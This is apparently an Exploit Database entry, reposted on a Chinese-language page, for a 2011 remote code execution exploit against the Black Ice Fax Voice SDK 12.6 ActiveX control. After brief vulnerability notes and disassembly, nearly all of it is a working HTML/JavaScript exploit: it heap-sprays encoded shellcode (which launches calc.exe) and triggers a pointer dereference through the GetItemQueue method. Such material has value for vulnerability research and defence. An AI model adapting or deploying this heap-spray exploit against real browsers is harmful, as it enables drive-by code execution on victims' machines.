Black Ice Fax Voice SDK 12.6 – Remote Code Execution

• Exploit Database
• 10 阅读

• 作者： mr_me
  日期： 2011-06-20
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17416/

• <html>
  <!--
  Black Ice Fax Voice SDK v12.6 - integer dereference code execution exploit
  Date: Jun 20, 2011
  Link: http://www.blackice.com/Fax%20C++%20ActiveX.htm
  Version: 12.6
  Tested on: WinXP - IE 6 & 7
   
  Class FAX
  GUID: {2E980303-C865-11CF-BA24-444553540000}
  Number of Interfaces: 1
  Default Interface: _DFAX
  RegKey Safe for Script: False
  RegkeySafe for Init: False
  KillBitSet: False
  
  Meh, despite the above, i found this bug slightly amusing >:) 
  
  Theres an integer overflow in this section of fax.ocx which is how i found the dereference vulnerability.
  
  1000CFA3	MOV ECX,[EBP+8]		< --- get our variable into ECX
  1000CFA6	MOV EDX,[ECX]		< --- dereference
  1000CFA8	MOV ECX,[EBP+8]		< --- get our variable into ECX again (meh)
  1000CFAB	CALL [EDX+14]		< --- !!!!
  
  and...
  
  EIP 1000CFA6 -> 51EC8B55
  EAX 1000CF82 -> 51EC8B55
  EBX 0013EC68 -> 01D29E90
  ECX FFFFFFFF
  EDX 73F360D3 -> EB0C4589
  EDI 0013EB98 -> 73F4D682
  ESI 00000000
  EBP 0013EB94 -> 0013EC10
  ESP 0013EB90 -> 0003A1A0
  
  vulnerable methods:
  GetFirstItem()
  GetItemQueue()
  
  prob more.
  -->
  
  <object classid='clsid:2E980303-C865-11CF-BA24-444553540000' id='target'/></object>
  <script language='javascript'>
  // Calc.exe
  var shellcode = unescape(
  '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
  '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
  '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
  '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
  '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
  '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
  '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
  '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'
  );
   
  var nops = unescape('%u0a0a%u0a0a');
  var headersize = 20;
  var slackspace = headersize + shellcode.length;
  while(nops.length < slackspace) {
  nops += nops;
  }
  var fillblock = nops.substring(0, slackspace);
  var block = nops.substring(0, nops.length - slackspace);
  while((block.length + slackspace) < 0x50000) {
  block = block + block + fillblock;
  }
  memory=new Array();
  for(counter=0; counter<200; counter++){
  memory[counter] = block + shellcode;
  }
  var boom = 168430090; // 0x0a0a0a0a
  target.GetItemQueue(boom);
  </script>
  </html>